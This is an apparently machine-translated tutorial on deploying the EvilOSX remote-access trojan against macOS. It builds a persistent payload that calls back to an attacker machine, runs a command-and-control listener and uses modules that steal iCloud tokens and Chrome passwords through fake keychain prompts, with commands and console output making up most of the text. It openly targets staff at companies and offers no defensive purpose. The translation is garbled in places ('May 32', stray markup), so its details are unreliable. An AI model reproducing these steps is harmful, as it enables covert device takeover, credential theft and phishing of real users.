Barrow's article on Pupy made me want a RAT targeting an operating system commonly used by gatekeepers at startups, tech companies, and creative companies: macOS. Once executed, a RAT can cause serious damage by deleting a user's stored credentials for many accounts. The best loot is in the Chrome Password Cache, and EvilOSX, an OS X RAT, infiltrates macOS and outputs these credentials.
Systems like macOS are often neglected in terms of security training, automatic updates, and speakerphone maintenance. Administration is the experience an Apple user pays for. It makes them wonderfully easy to exploit as a MacOS user often displays random "OK" system pop-ups that are more skeptical to a Windows user.
The purpose of a RAT is to gain a substantial first stop in a target computer. For this, EvilOSX stands out as a very powerful tool. Primarily written in Python, EvilOSX specializes in automating some devastating attacks that exploit the macOS environment.
EvilOSX is a pure Python RAT (Remote Administration Tool) for macOS / OSX after the exploitation.
EvilOSX runs on any operating system that supports Python. Therefore, this tutorial should work on Windows, MacOS, and Linux systems. To successfully complete this hack, you'll need an attack computer to create payloads and listen for connections, and a MacOS target computer to run and exploit the RAT.
This example creates a payload. Start a listening server and run the payload on our target to enjoy the remote control. To get started, you must download EvilOSX by opening a terminal window and typing.
~ $ git clone https://github.com/Marten4n6/EvilOSX.git Cloning in & # 39; EvilOSX & # 39; ... remote: list objects: 932, done. Remote: A total of 932 (Delta 0), reused 0 (Delta 0), pack-reused 932 Receive objects: 100% (932/932), 735.33 KiB | 395.00 KiB / s, done. Solving deltas: 100% (585/585), done.
You can now install the dependencies by running the following commands.
~ $ cd EvilOSX ~ / EvilOSX $ sudo pip install -r requirements.txt Condition already met: urwid in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 1)) (2.0.1) Requirement already fulfilled: pycryptodomex in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 2)) (3.6.1) Collect Pyside2 (from -r requirements.txt (line 3)) Https://files.pythonhosted.org/packages/2c/cf/c3cb6c7839df9c48226d709f93192e9fa71bcd39276df1d7be34db54f8fd/PySide2-5.12.3-5.12.3-cp27-cp27mu-m86linux 100% | ████████████████████████████████ | 143.4 MB 4.9 kB / s Requirement already fulfilled: future in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 4)) (0.16.0) Prerequisite already met: Entering /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 5)) (3.6.6) Collect shiboken2 == 5.12.3 (from pyside2 -> - r requirements.txt (line 3)) Download from https://files.pythonhosted.org/packages/71/91/b910ce8de326a793d10292d78478ebdbb1025843893c77028dbd9466c037/shiboken2-5.12.3-5.12.3-cp27-cp27mu-manylinux1_wx86_33764b 100% | ████████████████████████████████ | 337 KB 2.3 MB / s Install collected packages: shiboken2, pyside2 Pyside2-5.12.3 shiboken2-5.12.3 Successfully Installed
To create a payload, we start on our attack engine, where the git repository should be cloned from the top. Navigate to your new EvilOSX folder by typing cd EvilOSX in a terminal window if you are not already there. Type ls to display the contents of the folder.
~ $ cd EvilOSX ~ / EvilOSX $ ls offered data LICENSE.txt requirements.txt start.py CONTRIBUTING.md Dockerfile README.md server
To create this user data we need some information, eg. For example, the IP address of our attacking computer. To find this, you can enter ip a in the terminal window or ifconfig on a Mac. If you want to perform this attack outside your local network, you need a static, public IP address.
~ / EvilOSX $ ip a 1: lo:
mtu 65536 qdisc noqueue state UNKNOWN group standard qlen 1000 link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00 inet 184.108.40.206/8 scope host lo valid_lft forever preferred_lft forever inet6 :: 1/128 scope host valid_lft forever preferred_lft forever 2: eth0: mtu 1500 qdisc pfifo_fast status UP group default qlen 1000 link / ether 08: 00: ██: ██: ██: ██ brd ff: ff: ff: ff: ff: ff inet 192.168.0.24/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0 valid_lft 1351sec preferred_lft 1351sec inet6 ████ :: ███: ████: ████: ███ / ██ scope link noprefixroute valid_lft 3599sec preferred_lft 3599sec valid_lft forever preferred_lft forever inet6 ████ :: ███: ████: ████: ███ / ██ Scope valid_lft forever preferred_lft forever
Make a note of the IP address of your attacker computer (192.168.0.24 in my example) and begin creating our payload by entering the following in the terminal.
~ # python start .py --builder ▓█████ ▓█████ █▓ ▒██ ▒██ ▒██ ▓█ ▓█ ° █▒▓██▒▓██▒. ▒██▒. ▒ ▒▒ ▒ ° ▒███ ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° Mar ▒▓█ █ ° ° ° ° ° ° ° ° ██ ° ° ▒ ██▒ ░ ██▒ Mar Mar @ Marten4n6 (v7.2.1) ░██ ° ° ° ° ° ° ° ° ° ° ° ° ° GPLv3 licensed ░ ° C ° ░ ° C ° ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ° C ░ ░ ° ░ ° ░ ° ░ ° ░ ° ░ ° ░ ° ░ ° ░ ° ░ ° ° ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
The program asks you for the IP address of the attacking computer. Enter your IP address and then the server port of your choice. You can use 1337 for this build.
You will then be asked where EvilOSX should live and you can choose what you want. When asked if you want to use "python" or "rubber_ducky", choose Python. You can leave the loader empty and then enter a name for the launch agent followed by a name for the payload file. The result should be an EvilOSX Launcher Python build file located in the / builds folder.
[?] Server host (to which EvilOSX will connect): 192.168.0.24 [?] Server Port: 1337 [?] Where should EvilOSX live? (Leave blank for ~ / Library / Containers /.
): halloimbad [I] 2 available launchers: 0 = Python 1 = rubber_ducky [?] Launcher to use (leave blank for 1): 0 [I] 1 available loader: 0 = launch_daemon (makes payloads persistent via a launch daemon) [?] Loader to use (leave empty for 0): [?] Name of the starter agent (leave blank for com.apple. ): halloimrealbad [?] Payload filename (leave empty for ): badfileisme [I] Creating the Python Startup ... [I] Launcher written to: /root/EvilOSX/data/builds/Launcher-9a6953.py[19659023<loadingthisfiletoanUSBflashdrivecopythesamecreatedfile"EvilOSXpy"toyourtargetcomputer
To connect to our target computer when it tries to connect to us, we need to start a server on our attacker machine to wait for it. We will do this while we are still in the EvilOSX directory by executing the following command in the terminal.
~ # python start.py --cli --port 1337
The server is starting, and that's all. You can enter help at any time to see all available commands.
EvilOSX v7.2.1 | Harbor: 1337 | Available Bots: 0 [I] Server started and waiting for connections ... [I] Enter "help" to display the help menu. Command: Help [!] Commands other than those listed below run on the connected bot as a shell command. Help - Displays this help menu. Bots - Displays the number of available bots. connect
- Start interacting with the bot (required before using "use"). use - Run the module on the connected bot. stop - Prompts the module to stop execution. useall - Set the module to run on each bot. stopall - Deletes the globally set module. clear - clears the screen. exit / q / quit - Close the server and exit.
After the server is set up on the MacOS computer, run the Python payload you created by typing the following command, where "FILELOCATION" is in your directory was changed.
~ # python /FILELOCATION/Launcher-9a6953.py [DEBUG]
: 26 - Program directory: /FILELOCATION/Library/Containers/.wyiabHdroi [DEBUG] : 27 - Name of the starting agent: halloimrealbad [DEBUG] : 28 - payload filename: badfileisme [INFO] : 89 - Done!
Once you run the Python program, it is moved to a storage thread to reduce the risk of detection and ensure the RAT's consistency. Now that our payload is high, we can close the window if we want. Let's take another look at our server.
On our server we can see that an encrypted payload is being created. With the command bot we can see that we have control over the MacOS computer.
EvilOSX v7.2.1 | Harbor: 1337 | Available Bots: 1 [I] Server started and waiting for connections ... [I] Enter "help" to display the help menu. ----- [I] [launch_daemon] Creating encrypted payload data by using the key: 736b69636b61722d313930303730363930363831313232 Command: bot [I] No page was displayed that displays the first page. [I] Use "Bots
" to view a different page (each page contains 10 results). 0 = "UserName@Computer.local" (last seen: Fri, May 32 @ 01:02:55)
The most interesting thing we can do now is to run one or two modules. Use the command modules to display a list of all possible modules.
Command: modules download - Downloads a file or directory from the bot. browser_history - retrieve the browsing history (Chrome and Safari). update_bot - Updates the bot to the latest (local) version. upload - Uploads a file to the bot. phish_itunes - Phish the bot for his iCloud password via iTunes. CVE-2015-5889 - Trying to become root through CVE-2015-5889 (10.9.5 through 10.10.5). slowloris - Perform a Slowloris DoS attack. icloud_contacts - Gets iCloud contacts. screenshot - Take a screenshot from the screen of the bot. remove_bot - Remove EvilOSX from bot. chrome_passwords - Get Chrome passwords. webcam - take a picture with the webcam of the bot. Clipboard - Retrieves or monitors the clipboard clipboard. Microphone - pick up the microphone. get_info - Returns basic information about the bot. get_backups - Displays a list of devices backed up by iTunes. decrypt_mme - Gets iCloud and MMe authorization tokens.
To connect to this client, enter connect 0 . The ID of the client you want to connect to is replaced with "0".  Command: connect 0[I] Connected to "UserName@Computer.local", ready to send commands.
After connecting, some information about the computer must first be obtained. On our command and control system it will be displayed as queued and executed when it has time to retrieve, package and return the results. As you can see below, here is some useful information, such as: For example, the network name and the operating system version.
Command (UserName@Computer.local, /): Use get_info [I] Module added to queue "UserName@Computer.local". ----- System version: 10.14 Model: 15 "MacBook Pro with Thunderbolt 3 and Touch ID (mid-2017) Battery: 100% WiFi network: ██████████ We are not root 🙁 FileVault is enabled.
With the command decrypt.mme we can also go deeper.
Command (UserName@Computer.local, /): use decrypt.mme This prompts the bot to allow keychain access. [I] The module has been added to the Username@Computer.local queue.
The MacOS computer displays a keychain pop-up prompting you to turn on "Security" for sensitive information stored in the iCloud keychain by entering your password.
After this happens, some data will be displayed on the screen. We have the username, information about their accounts, their e-mail address and more.
Tokens are not cached to> = 10.13. Keychain is checked ... Decrypt the token list: / Users / UserName / Library / Application Support / iCloud / Accounts / 25558338272 Successfully decrypted! firstname.lastname@example.org ("Eos User", 25558338272): [+] cloutKitToken: █████████████████████████████████████████████ █████████████████████████████████████████████ Creation time: 2019-06-05 22:24:20 [+] mmeFMFAppToken: █████████████████████████████████████████████ █████████████████████████████████████████████ Creation time: 2019-06-05 22:24:20 [+] mmeAuthToken: █████████████████████████████████████████████ █████████████████████████████████████████████ Creation time: 2019-06-05 22:24:20 [+] mmeFMIPToken: █████████████████████████████████████████████ █████████████████████████████████████████████ Creation time: 2019-06-05 22:24:20 [+] mapsToken: █████████████████████████████████████████████ █████████████████████████████████████████████ Creation time: 2019-06-05 22:24:20 [+] mmeBTMMInfiniteToken: █████████████████████████████████████████████ █████████████████████████████████████████████ Creation time: 2019-06-05 22:24:20 Tokens stored at: /Users/UserName/Library/Containers/.wyiabHdroi/tokens.json[19659065<Step5:Chrome-Passwordsave
Now let's test one of the more advanced modules that is covered throughout this article. Use the chrome_passwords module to back up the Chrome passwords.
Command (UserName@Computer.local, /): Use chrome_passwords This prompts the bot to allow keychain access. [I] The module has been added to the Username@Computer.local queue.
The phishing attack on the target computer starts. The same thing is done as above, and users are tricked into entering their password.
The attack is especially effective when a user attempts to get work done, as he often accepts this prompt to work around it when it repeatedly appears , If you click on this "Allow" button, all passwords stored in Chrome will be saved.
If the attack succeeds, many passwords will be displayed on your screen. I'd show you a screenshot of a successful run, but it's just a lot, lots of creds I can not show.
If the attack was unsuccessful, many other attacks are included. Please reenter help to see some of the other modules that you can explore next to what we have discussed here today.
If you're done with remote administration, do this Make sure you send a final command remove_bot to end the connection and the client Server to clean up and remove. You will not be able to connect after that. Therefore, make sure that you are ready to release before executing the last command.
Command (UserName@Computer.local, /): Use remove_bot [?] Notify me when the bot is removed? [y/N]: y [?] Are you sure you want to continue? [Y/n]: y ----- [I] Module added to queue "UserName@Computer.local". ----- [I] [remove_bot] Goodbye!
EvilOSX offers many uses, and the attention to detail in automating certain exploits in the Apple ecosystem makes it a wonderfully purposeful tool. It's remarkable how easily we can launch phishing attacks to increase permissions or convince a user to get deeper into the system. I am curious to see what direction this masOS-oriented tool will take in the future.
If you have questions, you can leave them in the comments here or on Twitter at @ SADMIN2001 !